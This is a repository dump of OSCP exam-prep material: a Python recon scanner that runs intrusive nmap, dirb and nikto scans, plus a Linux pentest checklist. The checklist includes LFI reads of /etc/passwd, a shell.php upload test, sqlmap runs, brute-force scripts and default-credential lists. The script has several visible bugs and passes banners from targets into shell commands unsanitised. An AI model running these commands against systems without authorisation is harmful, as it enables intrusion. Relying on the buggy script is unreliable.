├── README.md ├── recon_enum └── reconscan.py ├── reports └── reports.txt ├── setup.sh └── templates ├── linux-template.md └── windows-template.md /README.md: -------------------------------------------------------------------------------- 1 | # oscp 2 | 3 | ## Reconscan.py 4 | 5 | This script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/). But it is heavily rewritten, some things have been added, other stuff has been removed. The script is written as a preparation for the OSCP exam. It was never meant to be a general script. So if you want to use it you have to make sure to fix all the hardcoded paths. The script is multithreaded and can be run against several hosts at once. 6 | 7 | The script is invoked like this: 8 | 9 | ``` 10 | python reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103 11 | ``` 12 | 13 | One important thing to note is that I removed the scan for all ports. Because it would sometimes just take to long to run. So make sure you either add that scan or run it afterwards. So you don't miss any ports. 14 | 15 | Please note that the script includes dirb and nikto-scans that are very invasive. The script also includes several nmap-scripts that check for vulnerabilities. So yeah, this script would be pretty illegal and bad to run against a machine you don't have permission to attack. 16 | 17 | ## Templates 18 | 19 | I created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for windows. There are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**. 20 | 21 | The templates are written in markdown. But I never actually rendered them, so I don't really know how they look like rendered. They are probably pretty messy. I also used them together with markdown syntax-highlightning in my editor, so it became easy to navigate the files. 22 | 23 | The templates have a few keywords in the, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, and it insert the target machine IP-address automatically. Some other stuff are also inserted automatically, like the a basic nmap-scan. And nikto-scan. 24 | 25 | Wherever there are references to a book. This is the book: https://bobloblaw.gitbooks.io/security/content/ 26 | -------------------------------------------------------------------------------- /recon_enum/reconscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import Process, Queue 5 | import os 6 | import time 7 | import fileinput 8 | import atexit 9 | import sys 10 | import socket 11 | import re 12 | 13 | # Todo: 14 | # Add mysql nmap-script 15 | # Change replace to sed: 16 | # sed 's|literal_pattern|replacement_string|g' 17 | 18 | start = time.time() 19 | 20 | class bcolors: 21 | HEADER = '\033[95m' 22 | OKBLUE = '\033[94m' 23 | OKGREEN = '\033[92m' 24 | WARNING = '\033[93m' 25 | FAIL = '\033[91m' 26 | ENDC = '\033[0m' 27 | BOLD = '\033[1m' 28 | UNDERLINE = '\033[4m' 29 | 30 | 31 | # Creates a function for multiprocessing. Several things at once. 32 | def multProc(targetin, scanip, port): 33 | jobs = [] 34 | p = multiprocessing.Process(target=targetin, args=(scanip,port)) 35 | jobs.append(p) 36 | p.start() 37 | return 38 | 39 | def connect_to_port(ip_address, port, service): 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | s.connect((ip_address, int(port))) 43 | banner = s.recv(1024) 44 | 45 | if service == "ftp": 46 | s.send("USER anonymous\r\n") 47 | user = s.recv(1024) 48 | s.send("PASS anonymous\r\n") 49 | password = s.recv(1024) 50 | total_communication = banner + "\r\n" + user + "\r\n" + password 51 | write_to_file(ip_address, "ftp-connect", total_communication) 52 | elif service == "smtp": 53 | total_communication = banner + "\r\n" 54 | write_to_file(ip_address, "smtp-connect", total_communication) 55 | elif service == "ssh": 56 | total_communication = banner 57 | write_to_file(ip_address, "ssh-connect", total_communication) 58 | elif service == "pop3": 59 | s.send("USER root\r\n") 60 | user = s.recv(1024) 61 | s.send("PASS root\r\n") 62 | password = s.recv(1024) 63 | total_communication = banner + user + password 64 | write_to_file(ip_address, "pop3-connect", total_communication) 65 | s.close() 66 | 67 | 68 | 69 | 70 | def write_to_file(ip_address, enum_type, data): 71 | 72 | file_path_linux = '../reports/%s/mapping-linux.md' % (ip_address) 73 | file_path_windows = '../reports/%s/mapping-windows.md' % (ip_address) 74 | paths = [file_path_linux, file_path_windows] 75 | print bcolors.OKGREEN + "INFO: Writing " + enum_type + " to template files:\n " + file_path_linux + " \n" + file_path_windows + bcolors.ENDC 76 | 77 | for path in paths: 78 | if enum_type == "portscan": 79 | subprocess.check_output("replace INSERTTCPSCAN \"" + data + "\" -- " + path, shell=True) 80 | if enum_type == "dirb": 81 | subprocess.check_output("replace INSERTDIRBSCAN \"" + data + "\" -- " + path, shell=True) 82 | if enum_type == "nikto": 83 | subprocess.check_output("replace INSERTNIKTOSCAN \"" + data + "\" -- " + path, shell=True) 84 | if enum_type == "ftp-connect": 85 | subprocess.check_output("replace INSERTFTPTEST \"" + data + "\" -- " + path, shell=True) 86 | if enum_type == "smtp-connect": 87 | subprocess.check_output("replace INSERTSMTPCONNECT \"" + data + "\" -- " + path, shell=True) 88 | if enum_type == "ssh-connect": 89 | subprocess.check_output("replace INSERTSSHCONNECT \"" + data + "\" -- " + path, shell=True) 90 | if enum_type == "pop3-connect": 91 | subprocess.check_output("replace INSERTPOP3CONNECT \"" + data + "\" -- " + path, shell=True) 92 | if enum_type == "curl": 93 | subprocess.check_output("replace INSERTCURLHEADER \"" + data + "\" -- " + path, shell=True) 94 | return 95 | 96 | 97 | 98 | def dirb(ip_address, port, url_start, wordlist="/usr/share/wordlist/dirb/big.txt, /usr/share/wordlist/dirb/vulns/cgis.txt"): 99 | print bcolors.HEADER + "INFO: Starting dirb scan for " + ip_address + bcolors.ENDC 100 | DIRBSCAN = "dirb %s://%s:%s %s -o ../reports/%s/dirb-%s.txt -r" % (url_start, ip_address, port, ip_address, ip_address, wordlist) 101 | print bcolors.HEADER + DIRBSCAN + bcolors.ENDC 102 | results_dirb = subprocess.check_output(DIRBSCAN, shell=True) 103 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with dirb scan for " + ip_address + bcolors.ENDC 104 | print results_dirb 105 | write_to_file(ip_address, "dirb", results_dirb) 106 | return 107 | 108 | def nikto(ip_address, port, url_start): 109 | print bcolors.HEADER + "INFO: Starting nikto scan for " + ip_address + bcolors.ENDC 110 | NIKTOSCAN = "nikto -h %s://%s -o ../reports/%s/nikto-%s-%s.txt" % (url_start, ip_address, ip_address, url_start, ip_address) 111 | print bcolors.HEADER + NIKTOSCAN + bcolors.ENDC 112 | results_nikto = subprocess.check_output(NIKTOSCAN, shell=True) 113 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with NIKTO-scan for " + ip_address + bcolors.ENDC 114 | print results_nikto 115 | write_to_file(ip_address, "nikto", results_nikto) 116 | return 117 | 118 | 119 | def httpEnum(ip_address, port): 120 | print bcolors.HEADER + "INFO: Detected http on " + ip_address + ":" + port + bcolors.ENDC 121 | print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC 122 | 123 | dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,"http")) 124 | dirb_process.start() 125 | nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,"http")) 126 | nikto_process.start() 127 | 128 | CURLSCAN = "curl -I http://%s" % (ip_address) 129 | print bcolors.HEADER + CURLSCAN + bcolors.END 130 | curl_results = subprocess.check_output(CURLSCAN, shell=True) 131 | write_to_file(ip_address, "curl", curl_results) 132 | HTTPSCAN = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s" % (port, ip_address, ip_address, ip_address) 133 | print bcolors.HEADER + HTTPSCAN + bcolors.ENDC 134 | 135 | http_results = subprocess.check_output(HTTPSCAN, shell=True) 136 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTP-SCAN for " + ip_address + bcolors.ENDC 137 | print http_results 138 | 139 | return 140 | 141 | def httpsEnum(ip_address, port): 142 | print bcolors.HEADER + "INFO: Detected https on " + ip_address + ":" + port + bcolors.ENDC 143 | print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC 144 | 145 | dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,"https")) 146 | dirb_process.start() 147 | nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,"https")) 148 | nikto_process.start() 149 | 150 | SSLSCAN = "sslscan %s:%s >> ../reports/%s/ssl_scan_%s" % (ip_address, port, ip_address, ip_address) 151 | print bcolors.HEADER + SSLSCAN + bcolors.ENDC 152 | ssl_results = subprocess.check_output(SSLSCAN, shell=True) 153 | print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with SSLSCAN for " + ip_address + bcolors.ENDC 154 | 155 | HTTPSCANS = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s" % (port, ip_address, ip_address, ip_address) 156 | print bcolors.HEADER + HTTPSCANS + bcolors.ENDC 157 | https_results = subprocess.check_output(HTTPSCANS, shell=True) 158 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTPS-scan for " + ip_address + bcolors.ENDC 159 | print https_results 160 | return 161 | 162 | def mssqlEnum(ip_address, port): 163 | print bcolors.HEADER + "INFO: Detected MS-SQL on " + ip_address + ":" + port + bcolors.ENDC 164 | print bcolors.HEADER + "INFO: Performing nmap mssql script scan for " + ip_address + ":" + port + bcolors.ENDC 165 | MSSQLSCAN = "nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes,mysql-empty-password,mysql-brute,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 --script-args=mssql.instance-port=1433,mssql.username=sa,mssql.password=sa -oN ../reports/%s/mssql_%s.nmap %s" % (port, ip_address, ip_address) 166 | print bcolors.HEADER + MSSQLSCAN + bcolors.ENDC 167 | mssql_results = subprocess.check_output(MSSQLSCAN, shell=True) 168 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with MSSQL-scan for " + ip_address + bcolors.ENDC 169 | print mssql_results 170 | return 171 | 172 | 173 | def smtpEnum(ip_address, port): 174 | print bcolors.HEADER + "INFO: Detected smtp on " + ip_address + ":" + port + bcolors.ENDC 175 | connect_to_port(ip_address, port, "smtp") 176 | SMTPSCAN = "nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN ../reports/%s/smtp_%s.nmap" % (port, ip_address, ip_address, ip_address) 177 | print bcolors.HEADER + SMTPSCAN + bcolors.ENDC 178 | smtp_results = subprocess.check_output(SMTPSCAN, shell=True) 179 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMTP-scan for " + ip_address + bcolors.ENDC 180 | print smtp_results 181 | # write_to_file(ip_address, "smtp", smtp_results) 182 | return 183 | 184 | def smbNmap(ip_address, port): 185 | print "INFO: Detected SMB on " + ip_address + ":" + port 186 | smbNmap = "nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos %s -oN ../reports/%s/smb_%s.nmap" % (ip_address, ip_address, ip_address) 187 | smbNmap_results = subprocess.check_output(smbNmap, shell=True) 188 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMB-Nmap-scan for " + ip_address + bcolors.ENDC 189 | print smbNmap_results 190 | return 191 | 192 | def smbEnum(ip_address, port): 193 | print "INFO: Detected SMB on " + ip_address + ":" + port 194 | enum4linux = "enum4linux -a %s > ../reports/%s/enum4linux_%s 2>/dev/null" % (ip_address, ip_address, ip_address) 195 | enum4linux_results = subprocess.check_output(enum4linux, shell=True) 196 | print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with ENUM4LINUX-Nmap-scan for " + ip_address + bcolors.ENDC 197 | print enum4linux_results 198 | return 199 | 200 | def ftpEnum(ip_address, port): 201 | print bcolors.HEADER + "INFO: Detected ftp on " + ip_address + ":" + port + bcolors.ENDC 202 | connect_to_port(ip_address, port, "ftp") 203 | FTPSCAN = "nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '../reports/%s/ftp_%s.nmap' %s" % (port, ip_address, ip_address, ip_address) 204 | print bcolors.HEADER + FTPSCAN + bcolors.ENDC 205 | results_ftp = subprocess.check_output(FTPSCAN, shell=True) 206 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with FTP-Nmap-scan for " + ip_address + bcolors.ENDC 207 | print results_ftp 208 | return 209 | 210 | def udpScan(ip_address): 211 | print bcolors.HEADER + "INFO: Detected UDP on " + ip_address + bcolors.ENDC 212 | UDPSCAN = "nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/%s/udp_%s.nmap' %s" % (ip_address, ip_address, ip_address) 213 | print bcolors.HEADER + UDPSCAN + bcolors.ENDC 214 | udpscan_results = subprocess.check_output(UDPSCAN, shell=True) 215 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with UDP-Nmap scan for " + ip_address + bcolors.ENDC 216 | print udpscan_results 217 | UNICORNSCAN = "unicornscan -mU -I %s > ../reports/%s/unicorn_udp_%s.txt" % (ip_address, ip_address, ip_address) 218 | unicornscan_results = subprocess.check_output(UNICORNSCAN, shell=True) 219 | print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with UNICORNSCAN for " + ip_address + bcolors.ENDC 220 | 221 | def sshScan(ip_address, port): 222 | print bcolors.HEADER + "INFO: Detected SSH on " + ip_address + ":" + port + bcolors.ENDC 223 | connect_to_port(ip_address, port, "ssh") 224 | SSHSCAN = "nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/%s/ssh_%s.nmap' %s" % (port, ip_address, ip_address, ip_address) 225 | print bcolors.HEADER + SSHSCAN + bcolors.ENDC 226 | results_ssh = subprocess.check_output(SSHSCAN, shell=True) 227 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SSH-Nmap-scan for " + ip_address + bcolors.ENDC 228 | print results_ssh 229 | return 230 | 231 | def pop3Scan(ip_address, port): 232 | print bcolors.HEADER + "INFO: Detected POP3 on " + ip_address + ":" + port + bcolors.ENDC 233 | connect_to_port(ip_address, port, "pop3") 234 | POP3SCAN = "nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '../reports/%s/pop3_%s.nmap' %s" % (port, ip_address, ip_address, ip_address) 235 | print bcolors.HEADER + SSHSCAN + bcolors.ENDC 236 | results_pop3 = subprocess.check_output(POP3SCAN, shell=True) 237 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with POP3-Nmap-scan for " + ip_address + bcolors.ENDC 238 | print results_pop3 239 | return 240 | 241 | 242 | def nmapScan(ip_address): 243 | ip_address = ip_address.strip() 244 | print bcolors.OKGREEN + "INFO: Running general TCP/UDP nmap scans for " + ip_address + bcolors.ENDC 245 | 246 | 247 | TCPSCAN = "nmap -sV -O %s -oN '../reports/%s/%s.nmap'" % (ip_address, ip_address, ip_address) 248 | print bcolors.HEADER + TCPSCAN + bcolors.ENDC 249 | results = subprocess.check_output(TCPSCAN, shell=True) 250 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with BASIC Nmap-scan for " + ip_address + bcolors.ENDC 251 | print results 252 | 253 | p = multiprocessing.Process(target=udpScan, args=(scanip,)) 254 | p.start() 255 | 256 | write_to_file(ip_address, "portscan", results) 257 | lines = results.split("\n") 258 | serv_dict = {} 259 | for line in lines: 260 | ports = [] 261 | line = line.strip() 262 | if ("tcp" in line) and ("open" in line) and not ("Discovered" in line): 263 | # print line 264 | while " " in line: 265 | line = line.replace(" ", " "); 266 | linesplit= line.split(" ") 267 | service = linesplit[2] # grab the service name 268 | 269 | port = line.split(" ")[0] # grab the port/proto 270 | # print port 271 | if service in serv_dict: 272 | ports = serv_dict[service] # if the service is already in the dict, grab the port list 273 | 274 | ports.append(port) 275 | # print ports 276 | serv_dict[service] = ports # add service to the dictionary along with the associated port(2) 277 | 278 | 279 | 280 | # go through the service dictionary to call additional targeted enumeration functions 281 | for serv in serv_dict: 282 | ports = serv_dict[serv] 283 | if re.search(r"http[^s]", serv): 284 | for port in ports: 285 | port = port.split("/")[0] 286 | multProc(httpEnum, ip_address, port) 287 | elif re.search(r"https|ssl", serv): 288 | for port in ports: 289 | port = port.split("/")[0] 290 | multProc(httpsEnum, ip_address, port) 291 | elif "smtp" in serv: 292 | for port in ports: 293 | port = port.split("/")[0] 294 | multProc(smtpEnum, ip_address, port) 295 | elif "ftp" in serv: 296 | for port in ports: 297 | port = port.split("/")[0] 298 | multProc(ftpEnum, ip_address, port) 299 | elif ("microsoft-ds" in serv) or ("netbios-ssn" == serv): 300 | for port in ports: 301 | port = port.split("/")[0] 302 | multProc(smbEnum, ip_address, port) 303 | multProc(smbNmap, ip_address, port) 304 | elif "ms-sql" in serv: 305 | for port in ports: 306 | port = port.split("/")[0] 307 | multProc(mssqlEnum, ip_address, port) 308 | elif "ssh" in serv: 309 | for port in ports: 310 | port = port.split("/")[0] 311 | multProc(sshScan, ip_address, port) 312 | elif "snmp" in serv: 313 | for port in ports: 314 | port = port.split("/")[0] 315 | multProc(snmpEnum, ip_address, port) 316 | 317 | return 318 | 319 | 320 | print bcolors.HEADER 321 | print "------------------------------------------------------------" 322 | print "!!!! RECON SCAN !!!!!" 323 | print "!!!! A multi-process service scanner !!!!!" 324 | print "!!!! dirb, nikto, ftp, ssh, mssql, pop3, tcp !!!!!" 325 | print "!!!! udp, smtp, smb !!!!!" 326 | print "------------------------------------------------------------" 327 | 328 | 329 | 330 | if len(sys.argv) < 2: 331 | print "" 332 | print "Usage: python reconscan.py " 333 | print "Example: python reconscan.py 192.168.1.101 192.168.1.102" 334 | print "" 335 | print "############################################################" 336 | pass 337 | sys.exit() 338 | 339 | print bcolors.ENDC 340 | 341 | if __name__=='__main__': 342 | 343 | # Setting ip targets 344 | targets = sys.argv 345 | targets.pop(0) 346 | 347 | dirs = os.listdir("../reports/") 348 | for scanip in targets: 349 | scanip = scanip.rstrip() 350 | if not scanip in dirs: 351 | print bcolors.HEADER + "INFO: No folder was found for " + scanip + ". Setting up folder." + bcolors.ENDC 352 | subprocess.check_output("mkdir ../reports/" + scanip, shell=True) 353 | subprocess.check_output("mkdir ../reports/" + scanip + "/exploits", shell=True) 354 | subprocess.check_output("mkdir ../reports/" + scanip + "/privesc", shell=True) 355 | print bcolors.OKGREEN + "INFO: Folder created here: " + "../reports/" + scanip + bcolors.ENDC 356 | subprocess.check_output("cp ../templates/windows-template.md ../reports/" + scanip + "/mapping-windows.md", shell=True) 357 | subprocess.check_output("cp ../templates/linux-template.md ../reports/" + scanip + "/mapping-linux.md", shell=True) 358 | print bcolors.OKGREEN + "INFO: Added pentesting templates: " + "../reports/" + scanip + bcolors.ENDC 359 | subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-windows.md", shell=True) 360 | subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-linux.md", shell=True) 361 | 362 | 363 | 364 | p = multiprocessing.Process(target=nmapScan, args=(scanip,)) 365 | p.start() 366 | -------------------------------------------------------------------------------- /reports/reports.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xapax/oscp/7ea469640337ca5ab282ba44e39665b398b32255/reports/reports.txt -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | folder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null) 4 | echo -e '#!/bin/bash\n' > /usr/bin/reconscan 5 | echo -e "cd $folder && python reconscan.py \"\$@\" \n" >> /usr/bin/reconscan 6 | chmod +x /usr/bin/reconscan 7 | 8 | -------------------------------------------------------------------------------- /templates/linux-template.md: -------------------------------------------------------------------------------- 1 | ## Info-sheet 2 | 3 | - DNS-Domain name: 4 | - Host name: 5 | - OS: 6 | - Server: 7 | - Kernel: 8 | - Workgroup: 9 | - Windows domain: 10 | 11 | Services and ports: 12 | INSERTTCPSCAN 13 | 14 | ## Recon 15 | 16 | 17 | ``` 18 | Always start with a stealthy scan to avoid closing ports. 19 | 20 | # Syn-scan 21 | nmap -sS INSERTIPADDRESS 22 | 23 | # Scan all ports, might take a while. 24 | nmap INSERTIPADDRESS -p- 25 | 26 | # Service-version, default scripts, OS: 27 | nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333 28 | 29 | # Scan for UDP 30 | nmap INSERTIPADDRESS -sU 31 | unicornscan -mU -v -I INSERTIPADDRESS 32 | 33 | # Connect to udp if one is open 34 | nc -u INSERTIPADDRESS 48772 35 | 36 | # Monster scan 37 | nmap INSERTIPADDRESS -p- -A -T4 -sC 38 | ``` 39 | 40 | 41 | ### Port 21 - FTP 42 | 43 | - FTP-Name: 44 | - FTP-version: 45 | - Anonymous login: 46 | 47 | INSERTFTPTEST 48 | 49 | 50 | ``` 51 | nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS 52 | ``` 53 | 54 | ### Port 22 - SSH 55 | 56 | - Name: 57 | - Version: 58 | - Takes-password: 59 | - If you have usernames test login with username:username 60 | 61 | INSERTSSHCONNECT 62 | 63 | ``` 64 | nc INSERTIPADDRESS 22 65 | ``` 66 | 67 | ### Port 25 68 | 69 | - Name: 70 | - Version: 71 | - VRFY: 72 | 73 | INSERTSMTPCONNECT 74 | 75 | 76 | ``` 77 | nc -nvv INSERTIPADDRESS 25 78 | HELO foo 79 | 80 | telnet INSERTIPADDRESS 25 81 | VRFY root 82 | 83 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS 84 | ``` 85 | 86 | ### Port 69 - UDP - TFTP 87 | 88 | This is used for tftp-server. 89 | 90 | 91 | ### Port 110 - Pop3 92 | 93 | - Name: 94 | - Version: 95 | 96 | INSERTPOP3CONNECT 97 | 98 | ``` 99 | telnet INSERTIPADDRESS 110 100 | USER pelle@INSERTIPADDRESS 101 | PASS admin 102 | 103 | or: 104 | 105 | USER pelle 106 | PASS admin 107 | 108 | # List all emails 109 | list 110 | 111 | # Retrieve email number 5, for example 112 | retr 9 113 | ``` 114 | 115 | ### Port 111 - Rpcbind 116 | 117 | ``` 118 | rpcinfo -p INSERTIPADDRESS 119 | ``` 120 | 121 | 122 | ### Port 135 - MSRPC 123 | 124 | Some versions are vulnerable. 125 | 126 | ### Port 143 - Imap 127 | 128 | ### Port 139/445 - SMB 129 | 130 | - Name: 131 | - Version: 132 | - Domain/workgroup name: 133 | - Domain-sid: 134 | - Allows unauthenticated login: 135 | 136 | 137 | ``` 138 | nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445 139 | 140 | 141 | enum4linux -a INSERTIPADDRESS 142 | rpcclient -U "" INSERTIPADDRESS 143 | srvinfo 144 | enumdomusers 145 | getdompwinfo 146 | querydominfo 147 | netshareenum 148 | netshareenumall 149 | 150 | smbclient -L INSERTIPADDRESS 151 | smbclient //INSERTIPADDRESS/tmp 152 | smbclient \\\\INSERTIPADDRESS\\ipc$ -U john 153 | smbclient //INSERTIPADDRESS/ipc$ -U john 154 | ``` 155 | 156 | 157 | ### Port 161/162 UDP - SNMP 158 | 159 | ``` 160 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS 161 | snmp-check -t INSERTIPADDRESS -c public 162 | ``` 163 | 164 | ``` 165 | # Common community strings 166 | public 167 | private 168 | community 169 | ``` 170 | 171 | 172 | ### Port 554 - RTSP 173 | 174 | 175 | ### Port 1030/1032/1033/1038 176 | 177 | Used by RPC to connect in domain network. 178 | 179 | ## Port 1521 - Oracle 180 | 181 | - Name: 182 | - Version: 183 | - Password protected: 184 | 185 | ``` 186 | tnscmd10g version -h INSERTIPADDRESS 187 | tnscmd10g status -h INSERTIPADDRESS 188 | ``` 189 | 190 | ### Port 2049 - NFS 191 | 192 | ``` 193 | showmount -e INSERTIPADDRESS 194 | 195 | If you find anything you can mount it like this: 196 | 197 | mount INSERTIPADDRESS:/ /tmp/NFS 198 | mount -t INSERTIPADDRESS:/ /tmp/NFS 199 | ``` 200 | 201 | ### Port 2100 - Oracle XML DB 202 | 203 | - Name: 204 | - Version: 205 | - Default logins: 206 | 207 | ``` 208 | sys:sys 209 | scott:tiger 210 | ``` 211 | 212 | Default passwords 213 | https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm 214 | 215 | 216 | ### 3306 - MySQL 217 | 218 | - Name: 219 | - Version: 220 | 221 | ``` 222 | nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306 223 | 224 | mysql --host=INSERTIPADDRESS -u root -p 225 | ``` 226 | 227 | ### Port 3339 - Oracle web interface 228 | 229 | 230 | - Basic info about web service (apache, nginx, IIS) 231 | - Server: 232 | - Scripting language: 233 | - Apache Modules: 234 | - IP-address: 235 | 236 | ### Port 80 - Web server 237 | 238 | - Server: 239 | - Scripting language: 240 | - Apache Modules: 241 | - IP-address: 242 | - Domain-name address: 243 | 244 | 245 | INSERTCURLHEADER 246 | 247 | - Web application (ex, wordpress, joomla, phpmyadmin) 248 | - Name: 249 | - Version: 250 | - Admin-login: 251 | 252 | 253 | ``` 254 | # Nikto 255 | nikto -h http://INSERTIPADDRESS 256 | 257 | # Nikto with squid proxy 258 | nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444 259 | 260 | # CMS Explorer 261 | cms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo] 262 | 263 | # WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users) 264 | wpscan --url http://INSERTIPADDRESS 265 | wpscan --url http://INSERTIPADDRESS --enumerate vp 266 | wpscan --url http://INSERTIPADDRESS --enumerate vt 267 | wpscan --url http://INSERTIPADDRESS --enumerate u 268 | 269 | # Joomscan 270 | joomscan -u http://INSERTIPADDRESS 271 | joomscan -u http://INSERTIPADDRESS --enumerate-components 272 | 273 | # Get header 274 | curl -i INSERTIPADDRESS 275 | 276 | # Get everything 277 | curl -i -L INSERTIPADDRESS 278 | 279 | # Check for title and all links 280 | curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' 281 | 282 | # Look at page with just text 283 | curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq 284 | 285 | # Check if it is possible to upload 286 | curl -v -X OPTIONS http://INSERTIPADDRESS/ 287 | curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php 288 | 289 | dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix 290 | ``` 291 | 292 | #### Nikto scan 293 | 294 | 295 | INSERTNIKTOSCAN 296 | 297 | 298 | #### Url brute force 299 | 300 | ``` 301 | # Not recursive 302 | dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt 303 | 304 | # Gobuster - remove relevant responde codes (403 for example) 305 | gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e 306 | ``` 307 | 308 | INSERTDIRBSCAN 309 | 310 | 311 | #### Default/Weak login 312 | 313 | Search documentation for default passwords and test them 314 | 315 | ``` 316 | site:webapplication.com password 317 | ``` 318 | 319 | ``` 320 | admin admin 321 | admin password 322 | admin 323 | admin 324 | root root 325 | root admin 326 | root password 327 | root 328 | password 329 | admin 330 | username 331 | username 332 | ``` 333 | 334 | 335 | #### LFI/RFI 336 | 337 | 338 | 339 | 340 | ``` 341 | fimap -u "http://INSERTIPADDRESS/example.php?test=" 342 | 343 | # Ordered output 344 | curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd 345 | /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page= 346 | ``` 347 | 348 | #### SQL-Injection 349 | 350 | ``` 351 | # Post 352 | ./sqlmap.py -r search-test.txt -p tfUPass 353 | 354 | # Get 355 | sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql 356 | 357 | # Crawl 358 | sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3 359 | ``` 360 | 361 | #### Sql-login-bypass 362 | 363 | - Open Burp-suite 364 | - Make and intercept a request 365 | - Send to intruder 366 | - Cluster attack. 367 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) 368 | - Attack 369 | - Check for response length variation 370 | 371 | 372 | ### Password brute force - last resort 373 | 374 | ``` 375 | cewl 376 | ``` 377 | 